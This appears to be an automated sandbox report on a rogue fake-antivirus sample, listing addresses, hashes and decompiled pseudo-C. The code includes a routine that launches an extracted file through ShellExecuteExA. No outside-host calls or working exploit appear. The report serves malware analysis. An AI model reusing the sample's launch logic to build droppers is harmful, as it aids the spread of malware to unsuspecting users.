                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004044e9
                                                                                                                                                              0x004044d1
                                                                                                                                                              0x004044d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004044d7
                                                                                                                                                              0x004044a8
                                                                                                                                                              0x0040436b
                                                                                                                                                              0x0040436d
                                                                                                                                                              0x0040436f
                                                                                                                                                              0x0040437f
                                                                                                                                                              0x00404383
                                                                                                                                                              0x00404387
                                                                                                                                                              0x0040438b
                                                                                                                                                              0x00404390
                                                                                                                                                              0x00404392
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404394
                                                                                                                                                              0x0040420b
                                                                                                                                                              0x00404211
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404216
                                                                                                                                                              0x0040425b
                                                                                                                                                              0x0040425d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040428d
                                                                                                                                                              0x00404292
                                                                                                                                                              0x00404294
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040429a
                                                                                                                                                              0x0040429d
                                                                                                                                                              0x004042a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042b2
                                                                                                                                                              0x004042b9
                                                                                                                                                              0x004042be
                                                                                                                                                              0x004042c6
                                                                                                                                                              0x004042cb
                                                                                                                                                              0x004042cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042dd
                                                                                                                                                              0x004042e1
                                                                                                                                                              0x004042e2
                                                                                                                                                              0x004042f8
                                                                                                                                                              0x00404302
                                                                                                                                                              0x0040430e
                                                                                                                                                              0x0040433c
                                                                                                                                                              0x00404341
                                                                                                                                                              0x00404343
                                                                                                                                                              0x00404352
                                                                                                                                                              0x00404357
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404357
                                                                                                                                                              0x00404345
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404247
                                                                                                                                                              0x00404247
                                                                                                                                                              0x0040424b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040424b
                                                                                                                                                              0x00404245
                                                                                                                                                              0x00404072
                                                                                                                                                              0x00404076
                                                                                                                                                              0x0040421d
                                                                                                                                                              0x00404223
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404223
                                                                                                                                                              0x0040407c
                                                                                                                                                              0x00404080
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404086
                                                                                                                                                              0x0040408a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404090
                                                                                                                                                              0x00404097
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040409d
                                                                                                                                                              0x004040a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004040a7
                                                                                                                                                              0x004040ad
                                                                                                                                                              0x004040b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004040ba
                                                                                                                                                              0x004040d9
                                                                                                                                                              0x004040db
                                                                                                                                                              0x00404186
                                                                                                                                                              0x00404186
                                                                                                                                                              0x004041bc
                                                                                                                                                              0x004041bc
                                                                                                                                                              0x004041c3
                                                                                                                                                              0x004041cd
                                                                                                                                                              0x004041e0
                                                                                                                                                              0x004041f9
                                                                                                                                                              0x004041fb
                                                                                                                                                              0x00404204
                                                                                                                                                              0x00404204
                                                                                                                                                              0x00404209
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404209
                                                                                                                                                              0x004040e7
                                                                                                                                                              0x004040ec
                                                                                                                                                              0x004040ef
                                                                                                                                                              0x004040f1
                                                                                                                                                              0x004040ff
                                                                                                                                                              0x00404104
                                                                                                                                                              0x00404106
                                                                                                                                                              0x0040412d
                                                                                                                                                              0x00404132
                                                                                                                                                              0x00404132
                                                                                                                                                              0x00404106
                                                                                                                                                              0x0040413e
                                                                                                                                                              0x00404143
                                                                                                                                                              0x0040415d
                                                                                                                                                              0x00404162
                                                                                                                                                              0x00404164
                                                                                                                                                              0x00404166
                                                                                                                                                              0x0040416a
                                                                                                                                                              0x004041ab
                                                                                                                                                              0x004041b7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004041b7
                                                                                                                                                              0x0040416c
                                                                                                                                                              0x00404173
                                                                                                                                                              0x00404181
                                                                                                                                                              0x00404181
                                                                                                                                                              0x00404173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404164
                                                                                                                                                              0x0040405d
                                                                                                                                                              0x00403fdd
                                                                                                                                                              0x00403fdd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403fdd
                                                                                                                                                              0x00403fb2
                                                                                                                                                              0x00403fb7
                                                                                                                                                              0x00403fb9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403fbb
                                                                                                                                                              0x00403fc2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403fd0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403fd0
                                                                                                                                                              0x00403f7c
                                                                                                                                                              0x00403f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403f80
                                                                                                                                                              0x00403f6d
                                                                                                                                                              0x00403f74
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403f74
                                                                                                                                                              0x00403f53
                                                                                                                                                              0x00403f5a
                                                                                                                                                              0x00403f5e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403f5e
                                                                                                                                                              0x00403ea5
                                                                                                                                                              0x00403eab
                                                                                                                                                              0x00403eaf
                                                                                                                                                              0x00403ed3
                                                                                                                                                              0x00403eb1
                                                                                                                                                              0x00403eb9
                                                                                                                                                              0x00403eb9
                                                                                                                                                              0x00403ed8
                                                                                                                                                              0x00403edc
                                                                                                                                                              0x00403ede
                                                                                                                                                              0x00403ee0
                                                                                                                                                              0x00403ee0
                                                                                                                                                              0x00403ee7
                                                                                                                                                              0x00403eeb
                                                                                                                                                              0x00403efe
                                                                                                                                                              0x00403f05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403eed
                                                                                                                                                              0x00403eed
                                                                                                                                                              0x00403ef4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ef6
                                                                                                                                                              0x00403f0a
                                                                                                                                                              0x00403f12
                                                                                                                                                              0x00403f17
                                                                                                                                                              0x00403f1b
                                                                                                                                                              0x00403f1d
                                                                                                                                                              0x00403f25
                                                                                                                                                              0x00403f2f
                                                                                                                                                              0x00403f34
                                                                                                                                                              0x00403f36
                                                                                                                                                              0x00403f3a
                                                                                                                                                              0x00403f3b
                                                                                                                                                              0x00403f3b
                                                                                                                                                              0x00403f36
                                                                                                                                                              0x00403f25
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403f1b
                                                                                                                                                              0x00403eeb
                                                                                                                                                              0x00403e30
                                                                                                                                                              0x00403e37
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e39
                                                                                                                                                              0x00403e39
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e39
                                                                                                                                                              0x00403e37
                                                                                                                                                              0x00403e0f
                                                                                                                                                              0x00403e13
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e17
                                                                                                                                                              0x00403e1c
                                                                                                                                                              0x00403e1e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e20
                                                                                                                                                              0x00403e23
                                                                                                                                                              0x00403e27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403e27
                                                                                                                                                              0x00403e1e
                                                                                                                                                              0x00403da3
                                                                                                                                                              0x00403da9
                                                                                                                                                              0x00403dac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403dbd
                                                                                                                                                              0x00403dc2
                                                                                                                                                              0x00403dc4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403dc6
                                                                                                                                                              0x00403dc6
                                                                                                                                                              0x00403dc8
                                                                                                                                                              0x00403ddd
                                                                                                                                                              0x00403de4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403de4
                                                                                                                                                              0x00403dc4
                                                                                                                                                              0x00403d58
                                                                                                                                                              0x00403d5e
                                                                                                                                                              0x00403d61
                                                                                                                                                              0x00403d63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d63
                                                                                                                                                              0x00403cf8
                                                                                                                                                              0x00403cff
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d01
                                                                                                                                                              0x00403d01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d01
                                                                                                                                                              0x00403c9e
                                                                                                                                                              0x00403ca4
                                                                                                                                                              0x00403ca7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ca9
                                                                                                                                                              0x00403cad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403caf
                                                                                                                                                              0x00403caf
                                                                                                                                                              0x00403cb1
                                                                                                                                                              0x00403cb3
                                                                                                                                                              0x00403cb3
                                                                                                                                                              0x00403cc6
                                                                                                                                                              0x00403cd2
                                                                                                                                                              0x00403cd4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403cd6
                                                                                                                                                              0x00403ce6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ce6
                                                                                                                                                              0x00403cd4
                                                                                                                                                              0x00403cad
                                                                                                                                                              0x00403bf8
                                                                                                                                                              0x00403bfd
                                                                                                                                                              0x00403c01
                                                                                                                                                              0x00403c03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c03
                                                                                                                                                              0x00403b73
                                                                                                                                                              0x00403b7f
                                                                                                                                                              0x00403b82
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b84
                                                                                                                                                              0x00403b8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b8b
                                                                                                                                                              0x00403aa5
                                                                                                                                                              0x00403aa8
                                                                                                                                                              0x00403aaf
                                                                                                                                                              0x00403aaf
                                                                                                                                                              0x00403ab6
                                                                                                                                                              0x00403ab6
                                                                                                                                                              0x00403ab9
                                                                                                                                                              0x00403b01
                                                                                                                                                              0x00403b01
                                                                                                                                                              0x00403b04
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b06
                                                                                                                                                              0x00403b0d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b1d
                                                                                                                                                              0x00403b22
                                                                                                                                                              0x00403b24
                                                                                                                                                              0x00403a7b
                                                                                                                                                              0x00403a82
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b2a
                                                                                                                                                              0x00403b2c
                                                                                                                                                              0x00403b41
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b41
                                                                                                                                                              0x00403abb
                                                                                                                                                              0x00403ac7
                                                                                                                                                              0x00403acc
                                                                                                                                                              0x00403ace
                                                                                                                                                              0x00403ad0
                                                                                                                                                              0x00403ad0
                                                                                                                                                              0x00403ad7
                                                                                                                                                              0x00403ade
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ae0
                                                                                                                                                              0x00403aeb
                                                                                                                                                              0x00403aed
                                                                                                                                                              0x00403af9
                                                                                                                                                              0x00403afe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403afe
                                                                                                                                                              0x00403ade
                                                                                                                                                              0x00403ab9
                                                                                                                                                              0x00403aaa
                                                                                                                                                              0x00403aad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403aad
                                                                                                                                                              0x00403a62
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a79
                                                                                                                                                              0x00403a8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a8c
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char
                                                                                                                                                              • String ID: E$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA
                                                                                                                                                              • API String ID: 751630497-346517416
                                                                                                                                                              • Opcode ID: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                              • Instruction ID: 3a254fb49c50d1bdf513d271921d20743245357351c521a06279862033cd8a45
                                                                                                                                                              • Opcode Fuzzy Hash: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                              • Instruction Fuzzy Hash: 298238B0904684ADDF25DF70C844BEBBBA9AF01304F0441BBFA99761C2D77D6A84CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040AD46(char _a4, long _a8) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				char _v43;
                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                              				signed int _v60;
                                                                                                                                                              				int _v64;
                                                                                                                                                              				void* _v68;
                                                                                                                                                              				intOrPtr _t48;
                                                                                                                                                              				struct HWND__* _t49;
                                                                                                                                                              
                                                                                                                                                              				_t49 = GetDlgItem( *0x419f80, 0x67);
                                                                                                                                                              				_v8 = _t49;
                                                                                                                                                              				if( *0x41a814 == 0) {
                                                                                                                                                              					_t48 =  *0x418ecc; // 0x0
                                                                                                                                                              					E0040649C(_t48);
                                                                                                                                                              					ShowWindow(_t49, 5); // executed
                                                                                                                                                              					SendMessageA(_t49, 0xb1, 0, 0xffffffff);
                                                                                                                                                              					SendMessageA(_t49, 0xc2, 0, 0x41259a);
                                                                                                                                                              					 *0x41a814 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                              				_v68 = 0x3c;
                                                                                                                                                              				SendMessageA(_v8, 0x43a, 0,  &_v68);
                                                                                                                                                              				_v43 = 0;
                                                                                                                                                              				_v64 = 1;
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_v60 = _v60 & 0xbfffffff | 1;
                                                                                                                                                              					_v48 = 0xa0;
                                                                                                                                                              					_v64 = 0x40000001;
                                                                                                                                                              				}
                                                                                                                                                              				SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                              				SendMessageA(_v8, 0xc2, 0, _a8);
                                                                                                                                                              				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_v60 = _v60 & 0xfffffffe | 0x40000000;
                                                                                                                                                              					SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                              				}
                                                                                                                                                              				return SendMessageA(_v8, 0xc2, 0, "\r\n");
                                                                                                                                                              			}











                                                                                                                                                              0x0040ad6a
                                                                                                                                                              0x0040ad6c
                                                                                                                                                              0x0040ad74
                                                                                                                                                              0x0040ad76
                                                                                                                                                              0x0040ad7c
                                                                                                                                                              0x0040ad84
                                                                                                                                                              0x0040ad90
                                                                                                                                                              0x0040ad9f
                                                                                                                                                              0x0040ada1
                                                                                                                                                              0x0040ada1
                                                                                                                                                              0x0040adb3
                                                                                                                                                              0x0040adc3
                                                                                                                                                              0x0040adca
                                                                                                                                                              0x0040add3
                                                                                                                                                              0x0040add7
                                                                                                                                                              0x0040adda
                                                                                                                                                              0x0040ade7
                                                                                                                                                              0x0040adea
                                                                                                                                                              0x0040adf1
                                                                                                                                                              0x0040adf1
                                                                                                                                                              0x0040ae05
                                                                                                                                                              0x0040ae14
                                                                                                                                                              0x0040ae1c
                                                                                                                                                              0x0040ae22
                                                                                                                                                              0x0040ae2f
                                                                                                                                                              0x0040ae40
                                                                                                                                                              0x0040ae40
                                                                                                                                                              0x0040ae57

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD90
                                                                                                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,0041259A), ref: 0040AD9F
                                                                                                                                                              • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADB3
                                                                                                                                                              • SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADCA
                                                                                                                                                              • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE05
                                                                                                                                                              • SendMessageA.USER32(?,000000C2,00000000,0040AE8F), ref: 0040AE14
                                                                                                                                                              • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AE1C
                                                                                                                                                              • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE40
                                                                                                                                                              • SendMessageA.USER32(?,000000C2,00000000,004125D0), ref: 0040AE51
                                                                                                                                                                • Part of subcall function 0040649C: DestroyWindow.USER32(?,76B4B980,0040AD81), ref: 004064A7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$DestroyItemShow
                                                                                                                                                              • String ID: <
                                                                                                                                                              • API String ID: 2996232536-4251816714
                                                                                                                                                              • Opcode ID: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                              • Instruction ID: 084cac9118b8bafa9f7e2012358cdd00eacd402f5ccca60df93bcffea555cbd4
                                                                                                                                                              • Opcode Fuzzy Hash: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                              • Instruction Fuzzy Hash: 1F318071E40218BAEB119BA4DC4AFEE7F79EB81754F148129F201BA1E0C7B51E10DB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 768 40bd80-40bd97 call 40a384 771 40bf94-40bf96 768->771 772 40bd9d-40bdbe call 40a289 768->772 775 40bdc0-40bdc6 772->775 776 40bdc8 772->776 777 40bdcb-40bdcf 775->777 776->777 778 40be10-40be13 777->778 779 40bdd1 777->779 780 40be24-40be38 call 407690 778->780 781 40be15-40be1b 778->781 782 40bdd3-40bdd6 779->782 793 40be50-40be5e call 405767 780->793 794 40be3a-40be47 call 40a59a 780->794 781->780 783 40be1d 781->783 785 40bdd8 782->785 786 40bdec-40bdf0 782->786 783->780 788 40bde0-40bde4 785->788 789 40bdf2-40bdf7 786->789 790 40be03-40be08 786->790 795 40bde6 788->795 796 40bdda-40bdde 788->796 789->790 797 40bdf9-40bdff 789->797 791 40be0a 790->791 792 40be0c-40be0d 790->792 791->792 792->778 804 40be60-40be75 call 405822 793->804 805 40be78-40be7b 793->805 794->793 806 40be49 794->806 795->786 796->788 798 40bde8 796->798 797->782 801 40be01 797->801 798->786 801->778 804->805 808 40beb7-40beca ShellExecuteExA 805->808 809 40be7d-40be80 805->809 806->793 812 40bee9-40bef8 808->812 813 40becc-40bee3 ShellExecuteExA 808->813 809->808 811 40be82-40beb1 call 40a477 call 40a5e2 call 405767 809->811 811->808 815 40bf92-40bf93 811->815 816 40befa-40befd 812->816 817 40beff-40bf06 812->817 813->812 813->815 815->771 816->817 818 40bf36-40bf42 CloseHandle 816->818 819 40bf20-40bf31 WaitForInputIdle call 40b6ea 817->819 820 40bf08-40bf11 IsWindowVisible 817->820 824 40bf44-40bf53 call 40a59a 818->824 825 40bf55-40bf5b 818->825 819->818 820->819 822 40bf13-40bf1c ShowWindow 820->822 822->819 824->825 835 40bf83-40bf86 824->835 829 40bf69-40bf7c 825->829 830 40bf5d-40bf60 825->830 834 40bf7d Sleep 829->834 830->829 833 40bf62-40bf67 830->833 833->834 834->835 835->815 837 40bf88-40bf90 ShowWindow 835->837 837->815
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040BD80(char* __eax, void* __ecx, long _a4) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				struct _SHELLEXECUTEINFOA _v72;
                                                                                                                                                              				char _v1096;
                                                                                                                                                              				char _v2120;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                              				char _t61;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				struct HWND__* _t65;
                                                                                                                                                              				long _t68;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				char* _t86;
                                                                                                                                                              				long _t87;
                                                                                                                                                              				char _t93;
                                                                                                                                                              				char* _t94;
                                                                                                                                                              				long _t96;
                                                                                                                                                              				char* _t99;
                                                                                                                                                              				intOrPtr _t121;
                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                              
                                                                                                                                                              				_t99 = __eax;
                                                                                                                                                              				_t56 = E0040A384(__ecx, __eax);
                                                                                                                                                              				if(_t56 >= 0x3f6) {
                                                                                                                                                              					return _t56;
                                                                                                                                                              				}
                                                                                                                                                              				_t96 = 0x3c;
                                                                                                                                                              				E0040A289(__ecx,  &_v72, 0, _t96);
                                                                                                                                                              				_t93 =  *_t99;
                                                                                                                                                              				_v72.cbSize = _t96;
                                                                                                                                                              				_v72.fMask = 0x5c0;
                                                                                                                                                              				if(_t93 != 0x22) {
                                                                                                                                                              					_v72.lpFile = _t99;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v72.lpFile = _t99 + 1;
                                                                                                                                                              				}
                                                                                                                                                              				_t59 = 0;
                                                                                                                                                              				if(_t93 == 0) {
                                                                                                                                                              					L19:
                                                                                                                                                              					if(_a4 == 0 &&  *0x41a392 != 0) {
                                                                                                                                                              						_v72.lpParameters = 0x41a392;
                                                                                                                                                              					}
                                                                                                                                                              					_v72.nShow = 1;
                                                                                                                                                              					_t60 = E00407690(_v72.lpFile);
                                                                                                                                                              					_v12 = _t60;
                                                                                                                                                              					if(_t60 != 0) {
                                                                                                                                                              						_t85 = E0040A59A(_t60, ".inf");
                                                                                                                                                              						_t112 = _t85;
                                                                                                                                                              						if(_t85 == 0) {
                                                                                                                                                              							_v72.lpVerb = "Install";
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t61 = E00405767(_t112, _v72.lpFile, 0);
                                                                                                                                                              					_v5 = _t61;
                                                                                                                                                              					if(_t61 != 0) {
                                                                                                                                                              						E00405822(_v72.lpFile,  &_v2120);
                                                                                                                                                              						_v72.lpFile =  &_v2120;
                                                                                                                                                              					}
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						L30:
                                                                                                                                                              						_t63 = ShellExecuteExA( &_v72); // executed
                                                                                                                                                              						if((_t63 & 0xffffff00 | _t63 != 0x00000000) != 0) {
                                                                                                                                                              							L32:
                                                                                                                                                              							_v5 = 0;
                                                                                                                                                              							_t121 =  *0x419f88; // 0x0
                                                                                                                                                              							if(_t121 != 0 || _a4 != 0) {
                                                                                                                                                              								_t65 =  *0x419f80; // 0x0
                                                                                                                                                              								if(_t65 != 0 && IsWindowVisible(_t65) != 0) {
                                                                                                                                                              									ShowWindow( *0x419f80, 0);
                                                                                                                                                              									_v5 = 1;
                                                                                                                                                              								}
                                                                                                                                                              								WaitForInputIdle(_v72.hProcess, 0x7d0);
                                                                                                                                                              								E0040B6EA(_v72.hProcess);
                                                                                                                                                              							}
                                                                                                                                                              							_t68 = CloseHandle(_v72.hProcess);
                                                                                                                                                              							if(_v12 == 0) {
                                                                                                                                                              								L40:
                                                                                                                                                              								_t127 =  *0x419f88; // 0x0
                                                                                                                                                              								if(_t127 == 0 || _a4 != 0) {
                                                                                                                                                              									__eflags = _a4;
                                                                                                                                                              									_t68 = ((0 | _a4 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                                                                                              									__eflags = _t68;
                                                                                                                                                              									Sleep(_t68);
                                                                                                                                                              								} else {
                                                                                                                                                              									Sleep(0x1b58);
                                                                                                                                                              								}
                                                                                                                                                              								goto L45;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t68 = E0040A59A(_v12, ".exe");
                                                                                                                                                              								if(_t68 == 0) {
                                                                                                                                                              									L45:
                                                                                                                                                              									if(_v5 != 0) {
                                                                                                                                                              										_t68 = ShowWindow( *0x419f80, 1);
                                                                                                                                                              									}
                                                                                                                                                              									goto L47;
                                                                                                                                                              								}
                                                                                                                                                              								goto L40;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v72.fMask = _v72.fMask & 0xfffffbff;
                                                                                                                                                              						_v72.lpFile = _t99;
                                                                                                                                                              						_t68 = ShellExecuteExA( &_v72) & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                              							goto L47;
                                                                                                                                                              						}
                                                                                                                                                              						goto L32;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t115 = _v5;
                                                                                                                                                              						if(_v5 != 0) {
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              						E0040A477( &_v1096, _v72.lpFile);
                                                                                                                                                              						E0040A5E2( &_v1096, ".exe");
                                                                                                                                                              						_t68 = E00405767(_t115,  &_v1096, 0);
                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                              							L47:
                                                                                                                                                              							return _t68;
                                                                                                                                                              						}
                                                                                                                                                              						goto L30;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t94 = _t99;
                                                                                                                                                              					do {
                                                                                                                                                              						if( *_t94 != 0x22) {
                                                                                                                                                              							L12:
                                                                                                                                                              							if( *((char*)(_t59 + _t99)) == 0x20 ||  *((char*)(_t59 + _t99 + 1)) == 0x2f) {
                                                                                                                                                              								_t86 = _t59 + _t99;
                                                                                                                                                              								__eflags =  *_t86 - 0x20;
                                                                                                                                                              								if( *_t86 == 0x20) {
                                                                                                                                                              									 *_t86 = 0;
                                                                                                                                                              								}
                                                                                                                                                              								_t87 = _t86 + 1;
                                                                                                                                                              								__eflags = _t87;
                                                                                                                                                              								_v72.lpParameters = _t87;
                                                                                                                                                              								goto L19;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						while(1) {
                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                              							if( *((intOrPtr*)(_t59 + _t99)) == 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *((char*)(_t59 + _t99)) - 0x22;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								 *((char*)(_t59 + _t99)) = 0x20;
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						goto L12;
                                                                                                                                                              						L14:
                                                                                                                                                              						_t59 = _t59 + 1;
                                                                                                                                                              						_t94 = _t59 + _t99;
                                                                                                                                                              					} while ( *_t94 != 0);
